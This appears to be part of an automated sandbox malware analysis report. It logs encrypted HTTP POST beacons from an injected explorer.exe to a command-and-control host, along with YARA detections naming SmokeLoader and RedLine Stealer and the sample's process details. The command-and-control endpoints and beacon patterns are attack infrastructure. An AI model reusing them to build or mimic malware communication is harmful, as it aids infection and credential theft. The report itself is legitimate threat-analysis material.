                                                                                                                                      2024-10-08 01:15:35 UTC7898INData Raw: 31 65 65 37 0d 0a 00 00 b5 50 0f 6d f7 61 d7 e7 49 78 ba 09 bf db 6e 5b 92 64 4f 0c f1 aa 5d 78 6e 1d 37 6e a3 bf 51 b7 61 50 c8 4c 75 ec 96 6c 61 47 6f 72 d9 5d 28 4a c9 17 cf ae b0 92 75 82 7c d6 cc 92 b4 cc 04 6e 80 d9 27 08 88 90 7c 25 38 3b 06 b0 d9 98 1f b3 ee 24 b2 8e 94 c4 c7 84 78 7f df ff 07 32 07 d4 23 b4 c2 cf a3 d9 18 29 4c b6 6d 7e 16 31 ba 88 9c 6f 27 9e 77 77 ec 42 27 39 f1 c8 b5 0f 2b 2c 37 f5 27 0c ee 96 8c 2c eb 7f 13 2a 58 0b a1 c6 4a a5 04 a5 ee 06 88 e3 1d 96 d0 4c d7 1a 1c 0b 6e 31 a2 fd 08 4f 89 d7 29 16 31 bd a7 21 aa 5c b5 b5 55 45 44 dc a1 75 85 c1 e8 06 3a f3 80 41 02 4f fe 76 f4 a8 10 4e 8c 77 26 ec 91 05 1d da 3e 11 60 70 e2 86 3d ef 6e dd fe db a9 55 d9 c9 5b 8a 82 ba 08 34 ee fb c7 34 41 b5 cd 3a 1d 0c d7 46 85 07 8f 3d 07
                                                                                                                                      Data Ascii: 1ee7PmaIxn[dO]xn7nQaPLulaGor](Ju|n'|%8;$x2#)Lm~1o'wwB'9+,7',*XJLn1O)1!\UEDu:AOvNw&>`p=nU[44A:F=
                                                                                                                                      2024-10-08 01:15:35 UTC19INData Raw: 1a 58 b3 14 d0 ff ef 1b ab d5 44 9d a9 19 24 1b 3c de a6
                                                                                                                                      Data Ascii: XD$<
                                                                                                                                      2024-10-08 01:15:35 UTC2INData Raw: 0d 0a
                                                                                                                                      Data Ascii:
                                                                                                                                      2024-10-08 01:15:35 UTC8192INData Raw: 32 30 30 30 0d 0a 4f b0 ac 7b 5b 94 2f 8e fb a5 49 75 0f 40 51 70 86 33 86 ea 54 c2 9c a9 b3 9c cf 10 ce 73 f3 0a 45 73 70 80 bd cf 7c c6 1c 25 20 f0 db 31 01 72 f0 5d 54 16 83 19 c9 78 43 66 d9 c7 7f 47 ca 0f f7 a2 70 1e 62 4f 97 d4 85 58 23 aa d0 91 09 29 ee 80 ff 8b 54 15 25 28 bd e0 44 37 f5 d2 98 eb 0f e0 d6 36 42 df 9d 30 3b 76 0a 49 8d d8 2a 5a 2c 48 85 64 39 6f df 29 ee ea 49 62 42 61 fc 57 6e 83 9a b6 22 77 a6 6b e0 cf c9 e4 7a 54 6a 49 6b 6f 35 b7 56 48 95 56 16 b2 96 49 9e ba 4c 2c 9b 9c 43 42 13 5b a3 ab 34 c0 82 5d a9 9e 70 45 78 63 d2 8a a7 06 b3 53 cc e2 23 f1 5f eb 82 a9 0c ba 27 c8 99 eb 5e 0c 15 68 6c d4 ae e1 12 2f 24 0c 48 6d a6 03 50 bc 8c c8 19 7b 50 c9 e8 5e 04 70 28 b9 77 49 81 50 c8 50 6b ae b4 0b 13 a5 ca 64 4c e6 f3 cd d4 f6 e4
                                                                                                                                      Data Ascii: 2000O{[/Iu@Qp3TsEsp|% 1r]TxCfGpbOX#)T%(D76B0;vI*Z,Hd9o)IbBaWn"wkzTjIko5VHVIL,CB[4]pExcS#_'^hl/$HmP{P^p(wIPPkdL
                                                                                                                                      2024-10-08 01:15:35 UTC6INData Raw: 4e 13 8c ae b0 c7
                                                                                                                                      Data Ascii: N
                                                                                                                                      2024-10-08 01:15:35 UTC2INData Raw: 0d 0a
                                                                                                                                      Data Ascii:
                                                                                                                                      2024-10-08 01:15:35 UTC8192INData Raw: 32 30 30 30 0d 0a 37 b0 80 d9 81 f6 4b 57 1e 8f 04 5f c4 c0 88 47 ee 18 f5 d8 ff a1 a2 c6 ae 36 1a 9d e0 fb 7a 50 95 22 b5 51 4d 25 b1 f4 18 0c 15 d1 06 0a 15 7b 23 d8 b9 63 41 09 53 8b 61 24 04 92 dd b9 c9 34 db 29 b1 d3 b5 7d 9b b6 ff 21 7f 68 a3 a1 98 ca f2 df ce 52 bb f4 67 4b 05 db df 01 f6 41 65 c4 8c 63 3c 95 b8 4a 79 8f 0e fc ec 98 91 1c 6c 75 27 c8 43 8c b3 ad 55 8f 66 a4 df a5 4c f4 c9 c1 69 5d 48 0b 4f 32 71 7a 52 6c c0 39 48 fa 96 d0 c8 ec f4 9c a0 0a 28 2c 0e 70 0f 5f 56 3f 57 12 a8 f7 ec d3 73 0d 42 60 a6 37 ca 65 e1 1c 43 c8 32 77 4f a8 25 84 73 8c 57 fe fd 9b 22 07 c9 76 67 b6 ef 85 11 52 c9 bf 4e b0 d6 66 9d d8 30 3f 8d 93 5a f5 d5 f3 5f 31 3d a5 2e 45 85 49 21 aa 61 86 37 f7 f5 9a 70 4c 4d f9 1c fb e1 fe d1 ee cb fa 02 71 1e 89 dd 8a 35
                                                                                                                                      Data Ascii: 20007KW_G6zP"QM%{#cASa$4)}!hRgKAec<Jylu'CUfLi]HO2qzRl9H(,p_V?WsB`7eC2wO%sW"vgRNf0?Z_1=.EI!a7pLMq5
                                                                                                                                      2024-10-08 01:15:35 UTC6INData Raw: eb 47 a6 2d 95 51
                                                                                                                                      Data Ascii: G-Q
                                                                                                                                      2024-10-08 01:15:35 UTC2INData Raw: 0d 0a
                                                                                                                                      Data Ascii:


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      18192.168.2.45003623.145.40.1684432580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-08 01:15:36 UTC284OUTPOST /search.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: https://hlglmlpnwcq.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 254
                                                                                                                                      Host: ninjahallnews.com
                                                                                                                                      2024-10-08 01:15:36 UTC254OUTData Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 41 4c 7a 34 01 83 b6 25 93 3c 26 b2 0b f2 af ce 24 16 e1 12 6e bc 5e e9 ea 2d 67 f7 0f 10 63 ca b8 93 57 e5 f6 5a 70 d7 eb 38 88 45 72 ba 80 6f 1f 67 01 04 2a 91 08 97 94 d0 47 8d 95 5e 30 56 a0 16 27 c7 34 02 fb e5 bf b1 47 3a 94 73 c1 27 ee 0c 22 c8 25 de 38 6a 27 35 50 ed cc 13 85 d6 3a ee 15 17 c9 cc 86 39 bf b8 4f f4 a3 f1 96 29 56 81 be de 56 43 a9 0c 47 e4 0e 0c 51 8a 32 2e 4f f2 33 78 26 d9 96 db 62 60 99 e5 09 f3 7e d0 f2 c6 72 0c 6d 52 f3 43 0d 5f 55 69 b2 54 fb df 2b 39 75 6f 01 84 f6 58 79 28 04 ab f3 c0 5f 87 c0 68 c0 72 cb b4 e6 db 68 ff
                                                                                                                                      Data Ascii: rmh9/2p6 )6IP g3iqH[ALz4%<&$n^-gcWZp8Erog*G^0V'4G:s'"%8j'5P:9O)VVCGQ2.O3x&b`~rmRC_UiT+9uoXy(_hrh
                                                                                                                                      2024-10-08 01:15:36 UTC287INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Tue, 08 Oct 2024 01:15:36 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Length: 409
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      2024-10-08 01:15:36 UTC409INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      19192.168.2.45004323.145.40.1684432580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-08 01:15:37 UTC288OUTPOST /search.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: https://xuoelobbpmbhamy.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 215
                                                                                                                                      Host: ninjahallnews.com
                                                                                                                                      2024-10-08 01:15:37 UTC215OUTData Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 7b 34 01 83 b7 25 93 3c 45 d5 00 9a dc ec 20 2e f3 23 18 9f 5d e7 d1 28 1e c6 03 03 7e a6 cb 94 4e e1 ce 12 19 d7 f0 74 f5 47 7f bd 8d 10 74 4e 19 5a 21 93 39 c5 d6 c0 35 f4 ac 59 08 1e 85 67 5e b2 2a 5e 81 cd f7 9b 33 24 a6 6e b0 52 9d 68 44 9d 1c 98 3d 5a 42 6d 5e ce f1 18 84 be 0d db 47 3d e5 d0 d2 4c e5 ec 1a b4 a2 8b a0 38 48 a6 8d df 08 30 94 1f 07 c9 73 15 1f a7 35 1e 60 c3 55 60 03 98 b1 c6 34 29 9d c9 0d e3 28 86 e1 b2 5f
                                                                                                                                      Data Ascii: rmh9/2p6 )6IP g3iqH[@L{4%<E .#](~NtGtNZ!95Yg^*^3$nRhD=ZBm^G=L8H0s5`U`4)(_
                                                                                                                                      2024-10-08 01:15:38 UTC278INHTTP/1.1 200 OK
                                                                                                                                      Date: Tue, 08 Oct 2024 01:15:37 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Length: 0
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      20192.168.2.45005523.145.40.1684436796C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-08 01:15:43 UTC287OUTPOST /search.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: https://ninjahallnews.com/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 4431
                                                                                                                                      Host: ninjahallnews.com
                                                                                                                                      2024-10-08 01:15:43 UTC4431OUTData Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 85 a6 6e 6c f2 e8 91 75 49 50 20 67 33 fa a7 84 c7 89 05 40 0c 18 e8 5a dd 46 4c 6a 34 01 83 b7 25 93 3c 5d cf 27 91 a3 dd 2a 25 c6 00 16 9c 51 e5 e3 1b 09 bf 67 33 46 c9 e0 f3 49 fe fe 76 77 f7 96 5d 8f 33 2d 87 e5 6a 0e 47 60 11 1a eb 19 bb 96 8a 06 8b e6 69 22 2e 90 41 39 b6 26 46 ed f7 99 a5 69 56 b5 62 da 54 94 20 7f ae 3f 85 54 4b 4c 0b 75 ad cd 7c ad ca 1d f6 1b 3c ec e1 bd 3a dd bf 5a 9c b9 91 a3 17 4e b1 d1 85 6a 24 b5 69 28 ed 0f 51 1e 91 2c 13 4f cb 21 37 3f 85 b8 db 25 42 8a fa 4d c6 42 99 f8 cf 13 08 0e 56 c3 1d 01 49 29 2d d7 2c 8d b5 13 36 13 26 14 e7 87 25 58 0f 3d aa ea 9e 23 d7 ce 20 e3 7a 96 a0 c8 a9 79 86 4f
                                                                                                                                      Data Ascii: rmh9/2p6nluIP g3@ZFLj4%<]'*%Qg3FIvw]3-jG`i".A9&FiVbT ?TKLu|<:ZNj$i(Q,O!7?%BMBVI)-,6&%X=# zyO
                                                                                                                                      2024-10-08 01:15:43 UTC287INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Tue, 08 Oct 2024 01:15:43 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Length: 409
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      2024-10-08 01:15:43 UTC409INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      21192.168.2.45006023.145.40.1684432580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-08 01:16:57 UTC287OUTPOST /search.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: https://qotplnnnyldonj.net/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 109
                                                                                                                                      Host: ninjahallnews.com
                                                                                                                                      2024-10-08 01:16:57 UTC109OUTData Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                                                                                      Data Ascii: rmh9/2p6 )6IP g3iqH[CLk4%<2eQvb%;=j ,
                                                                                                                                      2024-10-08 01:16:57 UTC285INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Tue, 08 Oct 2024 01:16:57 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Length: 7
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      2024-10-08 01:16:57 UTC7INData Raw: 03 00 00 00 1e 0d ae
                                                                                                                                      Data Ascii:


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      22192.168.2.45006123.145.40.1684432580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-08 01:16:58 UTC284OUTPOST /search.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: https://cubjgioqceo.net/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 241
                                                                                                                                      Host: ninjahallnews.com
                                                                                                                                      2024-10-08 01:16:58 UTC241OUTData Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6a 34 01 83 b7 25 93 3c 2c a5 22 ba c8 c1 04 0f ee 0b 6b f0 20 fe 94 7d 65 b1 70 3c 3f c8 b6 e2 2b d3 f1 72 51 f1 88 77 96 53 6e ed e1 6a 1f 47 5a 36 26 8f 33 8a fa 9c 0b d2 9a 52 20 30 99 13 35 af 59 1b c5 ed e8 c1 14 2e 89 5b b8 34 f3 2d 62 a4 08 d6 77 7d 6d 7a 5f db f3 0e af a4 3e 99 3d 68 fa a0 b9 5d c8 b7 6d f4 a6 9f bd 05 69 cc a7 9e 09 14 93 55 23 e8 10 16 1e b4 2e 1d 25 b4 28 71 5f 8a a6 fb 22 55 93 ef 62 ff 4e d9 bc b3 7d 6b 73 47 be 14 1e 72 1f 22 d9 0f f1 da 6a 00 01 61 29 db e6 39 20 2a 1d c5 a7
                                                                                                                                      Data Ascii: rmh9/2p6 )6IP g3iqH[@Lj4%<,"k }ep<?+rQwSnjGZ6&3R 05Y.[4-bw}mz_>=h]miU#.%(q_"UbN}ksGr"ja)9 *
                                                                                                                                      2024-10-08 01:16:58 UTC278INHTTP/1.1 200 OK
                                                                                                                                      Date: Tue, 08 Oct 2024 01:16:58 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Length: 0
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      23192.168.2.45006323.145.40.1684432580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-08 01:17:16 UTC284OUTPOST /search.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: https://jcipjgavjhg.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 109
                                                                                                                                      Host: ninjahallnews.com
                                                                                                                                      2024-10-08 01:17:16 UTC109OUTData Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                                                                                      Data Ascii: rmh9/2p6 )6IP g3iqH[CLk4%<2eQvb%;=j ,
                                                                                                                                      2024-10-08 01:17:16 UTC285INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Tue, 08 Oct 2024 01:17:16 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Length: 7
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      2024-10-08 01:17:16 UTC7INData Raw: 03 00 00 00 1e 0d af
                                                                                                                                      Data Ascii:


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      24192.168.2.45006523.145.40.1684432580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-08 01:17:34 UTC287OUTPOST /search.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: https://qdnfexfeugqvww.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 109
                                                                                                                                      Host: ninjahallnews.com
                                                                                                                                      2024-10-08 01:17:34 UTC109OUTData Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                                                                                      Data Ascii: rmh9/2p6 )6IP g3iqH[CLk4%<2eQvb%;=j ,
                                                                                                                                      2024-10-08 01:17:34 UTC285INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Tue, 08 Oct 2024 01:17:34 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Length: 7
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      2024-10-08 01:17:34 UTC7INData Raw: 03 00 00 00 1e 0d af
                                                                                                                                      Data Ascii:


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      25192.168.2.45006723.145.40.1684432580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-08 01:17:51 UTC285OUTPOST /search.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: https://hoxyxvpdayru.net/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 109
                                                                                                                                      Host: ninjahallnews.com
                                                                                                                                      2024-10-08 01:17:51 UTC109OUTData Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                                                                                      Data Ascii: rmh9/2p6 )6IP g3iqH[CLk4%<2eQvb%;=j ,
                                                                                                                                      2024-10-08 01:17:52 UTC285INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Tue, 08 Oct 2024 01:17:52 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Length: 7
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      2024-10-08 01:17:52 UTC7INData Raw: 03 00 00 00 1e 0d af
                                                                                                                                      Data Ascii:


                                                                                                                                      Statistics

                                                                                                                                      CPU Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      Memory Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      High Level Behavior Distribution

                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                      Behavior

                                                                                                                                      Click to jump to process

                                                                                                                                      System Behavior

                                                                                                                                      General

                                                                                                                                      Target ID:0
                                                                                                                                      Start time:21:13:53
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Users\user\Desktop\ctMI3TYXpX.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\ctMI3TYXpX.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:454'144 bytes
                                                                                                                                      MD5 hash:A27775738FAFF754DCF5C3E8E42B9838
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1726159167.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1726254840.00000000004F1000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1726176567.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1726176567.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1726400088.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1726400088.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:1
                                                                                                                                      Start time:21:13:59
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\Explorer.EXE
